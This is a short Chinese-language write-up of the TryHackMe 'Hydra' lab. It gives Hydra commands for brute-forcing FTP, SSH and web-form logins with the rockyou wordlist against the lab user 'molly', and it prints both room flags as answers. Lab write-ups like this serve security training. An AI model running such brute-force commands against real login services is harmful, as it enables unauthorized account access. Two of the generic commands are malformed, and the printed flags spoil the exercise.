tryhackme之Hydra

---

一、Hydra是什么？

二、使用方法

1.ftp

FTP:hydra -l user -P passlist.txt ftp://machine_ip

2.ssh

hydra -l -P 目标ip -t 4 ssh

3.提交web表单

hydra -l -P 目标ip http-post-form “/:username=^USER&password=^PASS:F=incorrect” -V

username 和 password为参数名，看具体情况改变

三、解题

1、Use Hydra to bruteforce molly’s web password. What is flag 1?

用户名：molly 破解密码

请求方法为POST

现在还差一个字典，可以用kali自带的字典
目录:/usr/share/wordlists/

dirb
dirbuster
fasttrack.txt
fern-wifi
metasploit
nmap.lst
rockyou.txt.gz
wfuzz

扫描二维码关注公众号，回复： 12661623 查看本文章

rockyou解压
gzip -d rockyou.txt.gz

构建语句：
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.134.48 http-post-form “/login:username=^USER&password=^PASS:F=incorrect” -V

THM{2673a7dd116de68e85c48ec0b1f2612e}

2、Use Hydra to bruteforce molly’s SSH password. What is flag 2?

构造语句：
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.134.48 -t 4 ssh

ssh登录后找到第二个flag

THM{c8eeb0468febbadea859baeb33b2541b}